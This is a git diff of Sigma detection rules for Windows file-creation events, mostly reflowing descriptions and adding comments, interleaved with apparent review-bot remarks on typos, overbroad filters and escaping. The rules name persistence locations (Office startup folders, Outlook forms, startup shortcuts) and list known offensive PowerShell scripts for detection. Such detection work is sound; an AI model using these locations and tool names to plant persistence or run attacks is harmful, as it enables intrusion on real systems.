@@ -1,8 +1,8 @@ title: New Outlook Macro Created id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 related: - - id: 117d3d3a-755c-4a61-b23e-9171146d094c - type: derived + - id: 117d3d3a-755c-4a61-b23e-9171146d094c + type: derived status: test description: Detects the creation of a macro file for Outlook. references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml index 42329c83c..4cf3bf47d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Outlook Form id: c3edc6a5-d9d4-48d8-930e-aab518390917 status: test -description: Detects the creation of a new Outlook form which can contain malicious - code +description: Detects the creation of a new Outlook form which can contain malicious code references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79 @@ -26,7 +25,7 @@ detection: Image|endswith: \outlook.exe TargetFilename|contains: - \AppData\Local\Microsoft\FORMS\IPM - - \Local Settings\Application Data\Microsoft\Forms + - \Local Settings\Application Data\Microsoft\Forms # Windows XP condition: file_event and selection falsepositives: - Legitimate use of outlook forms diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml index 1287fd3b2..5cd7e2441 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml 
@@ -1,8 +1,8 @@ title: Suspicious Outlook Macro Created id: 117d3d3a-755c-4a61-b23e-9171146d094c related: - - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 - type: derived + - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 + type: derived status: test description: Detects the creation of a macro file for Outlook. references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml b/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml index 2a76dfc95..1f7e79b3f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml @@ -1,8 +1,7 @@ title: Publisher Attachment File Dropped In Suspicious Location id: 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 status: test -description: Detects creation of files with the ".pub" extension in suspicious or - uncommon locations. This could be a sign of attackers abusing Publisher documents +description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents references: - https://twitter.com/EmericNasi/status/1623224526220804098 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml index 417a2d998..514111969 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml 
@@ -1,8 +1,7 @@ title: Potential Persistence Via Microsoft Office Startup Folder id: 0e20c89d-2264-44ae-8238-aeeaba609ece status: test -description: Detects creation of Microsoft Office files inside of one of the default - startup folders in order to achieve persistence. +description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. references: - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies - https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders @@ -21,11 +20,11 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_word_paths: - - TargetFilename|contains: \Microsoft\Word\STARTUP - - TargetFilename|contains|all: - - \Office - - \Program Files - - \STARTUP + - TargetFilename|contains: \Microsoft\Word\STARTUP + - TargetFilename|contains|all: + - \Office + - \Program Files + - \STARTUP selection_word_extension: TargetFilename|endswith: - .doc @@ -35,11 +34,11 @@ detection: - .dotm - .rtf selection_excel_paths: - - TargetFilename|contains: \Microsoft\Excel\XLSTART - - TargetFilename|contains|all: - - \Office - - \Program Files - - \XLSTART + - TargetFilename|contains: \Microsoft\Excel\XLSTART + - TargetFilename|contains|all: + - \Office + - \Program Files + - \XLSTART selection_excel_extension: TargetFilename|endswith: - .xls @@ -51,8 +50,7 @@ detection: Image|endswith: - \WINWORD.exe - \EXCEL.exe - condition: file_event and ((all of selection_word_* or all of selection_excel_*) - and not filter_main_office) + condition: file_event and ((all of selection_word_* or all of selection_excel_*) and not filter_main_office) falsepositives: - Loading a user environment from a backup or a domain controller - Synchronization of templates 
diff --git a/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml b/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml index 35d5f9484..2f488c5fe 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml @@ -1,13 +1,11 @@ title: File With Uncommon Extension Created By An Office Application id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 status: experimental -description: Detects the creation of files with an executable or script extension - by an Office application. +description: Detects the creation of files with an executable or script extension by an Office application. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron - Systems) +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) date: 2021/08/23 modified: 2023/06/22 tags: @@ -18,6 +16,7 @@ logsource: product: windows category: file_event detection: + # Note: Please add more file extensions to the logic of your choice. file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational @@ -47,7 +46,7 @@ detection: - .vbs - .wsf - .wsh - filter_optional_webservicecache: + filter_optional_webservicecache: # matches e.g. directory with name *.microsoft.com TargetFilename|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Office\ 
@@ -62,8 +61,7 @@ detection: filter_main_localassembly: TargetFilename|contains: \AppData\Local\assembly\tmp\ TargetFilename|endswith: .dll - condition: file_event and (all of selection* and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: file_event and (all of selection* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml b/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml index cc829427c..3c88b8d69 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml @@ -1,8 +1,7 @@ title: Uncommon File Created In Office Startup Folder id: a10a2c40-2c4d-49f8-b557-1a946bc55d9d status: experimental -description: Detects the creation of a file with an uncommon extension in an Office - application startup folder +description: Detects the creation of a file with an uncommon extension in an Office application startup folder references: - https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/ - http://addbalance.com/word/startup.htm 
@@ -23,28 +22,28 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_word_paths: - - TargetFilename|contains: \Microsoft\Word\STARTUP - - TargetFilename|contains|all: - - \Office - - \Program Files - - \STARTUP + - TargetFilename|contains: \Microsoft\Word\STARTUP + - TargetFilename|contains|all: + - \Office + - \Program Files + - \STARTUP filter_exclude_word_ext: TargetFilename|endswith: - - .docb - - .docm - - .docx - - .dotm - - .mdb - - .mdw - - .pdf - - .wll - - .wwl + - .docb # Word binary document introduced in Microsoft Office 2007 + - .docm # Word macro-enabled document; same as docx, but may contain macros and scripts + - .docx # Word document + - .dotm # Word macro-enabled template; same as dotx, but may contain macros and scripts + - .mdb # MS Access DB + - .mdw # MS Access DB + - .pdf # PDF documents + - .wll # Word add-in + - .wwl # Word add-in selection_excel_paths: - - TargetFilename|contains: \Microsoft\Excel\XLSTART - - TargetFilename|contains|all: - - \Office - - \Program Files - - \XLSTART + - TargetFilename|contains: \Microsoft\Excel\XLSTART + - TargetFilename|contains|all: + - \Office + - \Program Files + - \XLSTART filter_exclude_excel_ext: TargetFilename|endswith: - .xll @@ -64,9 +63,7 @@ detection: Image|endswith: - \winword.exe - \excel.exe - condition: file_event and (((selection_word_paths and not filter_exclude_word_ext) - or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of - filter_main_*) + condition: file_event and (((selection_word_paths and not filter_exclude_word_ext) or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of filter_main_*) falsepositives: - False positive might stem from rare extensions used by other Office utilities. level: high diff --git a/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml b/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml index 6c1e634b0..5b3e6a106 100644 
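Review bot: The comment added on `.mdw` in filter_exclude_word_ext reads `# MS Access DB`, but .mdw is the Access workgroup information (security) file rather than a database; `- .mdw # MS Access workgroup information file` would be accurate. The same hunk documents `.wll` and `.wwl` as Word add-ins without saying why add-in files dropped into the STARTUP folder are exempted from a rule titled "Uncommon File Created In Office Startup Folder", so a tuner cannot tell whether that exclusion is a deliberate hand-off to another rule or a gap. A one-line comment on the filter naming the rule that covers add-in files, or stating that they are intentionally out of scope here, would settle it. Apart from the comments and re-indentation, no detection logic changes in this hunk.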
--- a/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml
@@ -1,8 +1,7 @@
 title: Suspicious File Created In PerfLogs
 id: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b
 status: experimental
-description: Detects suspicious file based on their extension being created in "C:\PerfLogs\".
- Note that this directory mostly contains ".etl" files
+description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
 references:
 - Internal Research
 - https://labs.withsecure.com/publications/fin7-target-veeam-servers
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml
index 5af4436d5..5ecaf853c 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml
@@ -44,13 +44,13 @@ detection:
 - .dll
 - .exe
 filter_main_admin_temp:
+ # Example: C:\Windows\Temp\0DA9758B-4649-4969-9409-5CBDF193FB53\TransmogProvider.dll
 TargetFilename|startswith: C:\Windows\Temp\
 TargetFilename|endswith:
 - .dll
 - .exe
 condition: file_event and (selection and not 1 of filter_main_*)
 falsepositives:
- - False positives will differ depending on the environment and scripts used. Apply
- additional filters accordingly.
+ - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml
index b60157d32..18631c582 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml
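Review bot: The example comment added to filter_main_admin_temp names one GUID subfolder and one file (TransmogProvider.dll), but the filter itself still exempts every .dll and .exe created anywhere under C:\Windows\Temp\, which is a much wider exclusion than the example suggests for a rule about PowerShell dropping binaries. If the documented case is the known benign source, narrowing the filter to it, e.g. adding `TargetFilename|endswith: \TransmogProvider.dll` next to the existing `startswith`, keeps the exemption as small as the comment implies; if the broad exemption is deliberate, the comment should say so and why. The rest of the hunk is a wording-only reflow of the falsepositives entry.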
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml @@ -1,9 +1,7 @@ title: PowerShell Script Dropped Via PowerShell.EXE id: 576426ad-0131-4001-ae01-be175da0c108 status: experimental -description: Detects PowerShell creating a PowerShell file (.ps1). While often times - this behavior is benign, sometimes it can be a sign of a dropper script trying - to achieve persistence. +description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: frack113 @@ -32,7 +30,6 @@ detection: TargetFilename|startswith: C:\Windows\Temp\ condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - False positives will differ depending on the environment and scripts used. Apply - additional filters accordingly. + - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. level: low ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml index 502ee99dc..f06ad03cc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml @@ -1,8 +1,8 @@ title: Malicious PowerShell Scripts - FileCreation id: f331aa1f-8c53-4fc3-b083-cc159bc971cb related: - - id: 41025fd7-0466-4650-a813-574aaacbe7f4 - type: similar + - id: 41025fd7-0466-4650-a813-574aaacbe7f4 + type: similar status: test description: Detects the creation of known offensive powershell scripts used for exploitation references: 
@@ -17,8 +17,8 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec - https://github.com/HarmJ0y/DAMP - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ @@ -26,8 +26,7 @@ references: - https://github.com/Kevin-Robertson/Powermad - https://github.com/adrecon/ADRecon - https://github.com/adrecon/AzureADRecon -author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, - Georg Lauenstein +author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein date: 2018/04/07 modified: 2023/04/17 tags: @@ -43,6 +42,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_generic: TargetFilename|endswith: + # Note: Please ensure alphabetical order when adding new entries - \Add-ConstrainedDelegationBackdoor.ps1 - \Add-Exfiltration.ps1 - \Add-Persistence.ps1 @@ -270,7 +270,7 @@ detection: - \WinPwn.ps1 - \WSUSpendu.ps1 selection_invoke_sharp: - TargetFilename|contains: Invoke-Sharp + TargetFilename|contains: Invoke-Sharp # Covers all "Invoke-Sharp" variants TargetFilename|endswith: .ps1 condition: file_event and (1 of selection_*) falsepositives: 
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml
index b71fb41b5..a87d83f93 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml
@@ -1,8 +1,7 @@
 title: PowerShell Module File Created
 id: e36941d0-c0f0-443f-bc6f-cb2952eb69ea
 status: experimental
-description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll",
- ".ps1", etc.
+description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
 references:
 - Internal Research
 - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml
index 69f2d5e76..6580f78c5 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml
@@ -1,10 +1,7 @@
 title: Potential Suspicious PowerShell Module File Created
 id: e8a52bbd-bced-459f-bd93-64db45ce7657
 status: experimental
-description: Detects the creation of a new PowerShell module in the first folder of
- the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1".
- This is somewhat an uncommon practice as legitimate modules often includes a version
- folder.
+description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
 references:
 - Internal Research
 - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
@@ -22,11 +19,11 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 TargetFilename|endswith:
+ # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic
 - \\WindowsPowerShell\\Modules\\*\.ps
 - \\WindowsPowerShell\\Modules\\*\.dll
 condition: file_event and selection
 falsepositives:
- - False positive rate will vary depending on the environments. Additional filters
- might be required to make this logic usable in production.
+ - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml
index 8867ab06d..66256a50a 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml
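Review bot: The two `TargetFilename|endswith` values in this hunk are written with regex-style escapes (`\\` and `\.`) under a plain-string modifier; under Sigma plain-string escaping `\\` is a single backslash and `\.ps` is a backslash followed by `.ps`, so as written the value would only match a file literally named `.ps` (or `.dll`) directly under a module subfolder rather than any `.ps*` file there. If a regular expression is intended, `|re` is the right modifier; if the backend used here treats the value as a glob, a comment next to the new PowerShell 7 note saying so would stop the next reader from "fixing" it. This is inferred from the visible values and modifier only, so confirm against the converter's actual matching behaviour.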
@@ -1,8 +1,7 @@
 title: PowerShell Module File Created By Non-PowerShell Process
 id: e3845023-ca9a-4024-b2b2-5422156d5527
 status: experimental
-description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll",
- ".ps1", etc. by a non-PowerShell process
+description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
 references:
 - Internal Research
 - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
@@ -27,10 +26,10 @@ detection:
 Image|endswith:
 - :\Program Files\PowerShell\7-preview\pwsh.exe
 - :\Program Files\PowerShell\7\pwsh.exe
- - :\Windows\System32\poqexec.exe
+ - :\Windows\System32\poqexec.exe # https://github.com/SigmaHQ/sigma/issues/4448
 - :\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
 - :\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- - :\Windows\SysWOW64\poqexec.exe
+ - :\Windows\SysWOW64\poqexec.exe # https://github.com/SigmaHQ/sigma/issues/4448
 - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
 - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 condition: file_event and (selection and not 1 of filter_main_*)
diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml
index afee60c60..56e2db1ef 100644
--- a/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml
@@ -1,19 +1,11 @@ title: Potential Startup Shortcut Persistence Via PowerShell.EXE id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d status: test -description: 'Detects PowerShell writing startup shortcuts. - - This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently - observe adversaries using PowerShell to write malicious .lnk files into the startup - directory to establish persistence. - - Accordingly, this detection opportunity is likely to identify persistence mechanisms - in multiple threats. - - In the context of Yellow Cockatoo, this persistence mechanism eventually launches - the command-line script that leads to the installation of a malicious DLL" - - ' +description: | + Detects PowerShell writing startup shortcuts. + This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. + Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. + In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder @@ -39,7 +31,6 @@ detection: TargetFilename|endswith: .lnk condition: file_event and selection falsepositives: - - Depending on your environment accepted applications may leverage this at times. - It is recommended to search for anomalies inidicative of malware. + - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware. level: high ruletype: Sigma 
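Review bot: The reflowed falsepositives entry keeps the typo `inidicative`; since the line is being rewritten anyway, `- Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies indicative of malware.` fixes it without another reflow later. The description hunk above it in this file is the same kind of wording-only change, so the fix fits the scope of this update.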
diff --git a/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml b/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
index d3cccd4c2..42c603426 100644
--- a/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
@@ -1,9 +1,7 @@
 title: PSScriptPolicyTest Creation By Uncommon Process
 id: 1027d292-dd87-4a1a-8701-2abe04d7783c
 status: experimental
-description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by
- an uncommon process. This file is usually generated by Microsoft Powershell to
- test against Applocker.
+description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
 references:
 - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml
index 71da7e67a..e564c3df1 100644
--- a/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml
@@ -19,6 +19,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith:
+ # Covers browsers
 - \brave.exe
 - \CCleaner Browser\Application\CCleanerBrowser.exe
 - \chromium.exe
@@ -30,10 +31,12 @@ detection: - \Opera.exe - \Vivaldi.exe - \Whale.exe + # Covers email clients - \Outlook.exe - - \RuntimeBroker.exe + - \RuntimeBroker.exe # If the windows mail client is used - \Thunderbird.exe - - \Discord.exe + # Covers chat applications + - \Discord.exe # Should open the browser for download, but just in case. - \Keybase.exe - \msteams.exe - \Slack.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml b/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml index ee8a2f901..edd543cdf 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml @@ -1,8 +1,7 @@ title: RemCom Service File Creation id: 7eff1a7f-dd45-4c20-877a-f21e342a7611 status: test -description: Detects default RemCom service filename which indicates RemCom service - installation and execution +description: Detects default RemCom service filename which indicates RemCom service installation and execution references: - https://github.com/kavika13/RemCom/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml index 68f3cebce..c3d1e8c03 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml 
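Review bot: The new comment `# If the windows mail client is used` on `\RuntimeBroker.exe` understates what that entry matches: RuntimeBroker.exe performs file writes on behalf of UWP applications in general, so .rdp files written by any packaged app, not only Mail, will hit this selection. A comment such as `# RuntimeBroker.exe writes on behalf of UWP apps (e.g. the Windows Mail client), so other packaged apps also match` sets the right expectation for tuning. The grouping comments for browsers, email clients and chat applications are a useful addition.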
@@ -1,18 +1,10 @@ title: ScreenConnect Temporary Installation Artefact id: fec96f39-988b-4586-b746-b93d59fd1922 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows author: frack113 @@ -29,7 +21,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetFilename|contains: \Bin\ScreenConnect. + TargetFilename|contains: \Bin\ScreenConnect. # pattern to dll and jar file condition: file_event and selection falsepositives: - Legitimate use 
diff --git a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml index b371ab7e7..a4f473abc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml @@ -1,17 +1,12 @@ title: Remote Access Tool - ScreenConnect Temporary File id: 0afecb6e-6223-4a82-99fb-bf5b981e92a5 related: - - id: b1f73849-6329-4069-bc8f-78a604bb8b23 - type: similar + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar status: experimental -description: 'Detects the creation of files in a specific location by ScreenConnect - RMM. - - ScreenConnect has feature to remotely execute binaries on a target machine. These - binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" - before execution. - - ' +description: | + Detects the creation of files in a specific location by ScreenConnect RMM. + ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. references: - https://github.com/SigmaHQ/sigma/pull/4467 author: Ali Alwashali @@ -33,5 +28,5 @@ detection: condition: file_event and selection falsepositives: - Legitimate use of ScreenConnect -level: low +level: low # Incrase the level if screenconnect is not used ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml b/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml index 73e60e0dd..8ff70522c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml 
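Review bot: The trailing comment added to `level: low` has a typo, `Incrase`, and lower-cases the product name; `level: low # Increase the level if ScreenConnect is not used in your environment` reads cleanly. The level line is the rule's main tuning knob, so this is the right place for the advice and worth getting the wording right.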
@@ -1,17 +1,10 @@ title: Potential RipZip Attack on Startup Folder id: a6976974-ea6f-4e97-818e-ea08625c52cb status: test -description: 'Detects a phishing attack which expands a ZIP file containing a malicious - shortcut. - - If the victim expands the ZIP file via the explorer process, then the explorer - process expands the malicious ZIP file and drops a malicious shortcut redirected - to a backdoor into the Startup folder. - - Additionally, the file name of the malicious shortcut in Startup folder contains - {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. - - ' +description: | + Detects a phishing attack which expands a ZIP file containing a malicious shortcut. + If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. + Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. references: - https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19 author: Greg (rule) @@ -28,7 +21,7 @@ detection: file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational - selection: + selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk TargetFilename|contains|all: - \Microsoft\Windows\Start Menu\Programs\Startup - .lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D} diff --git 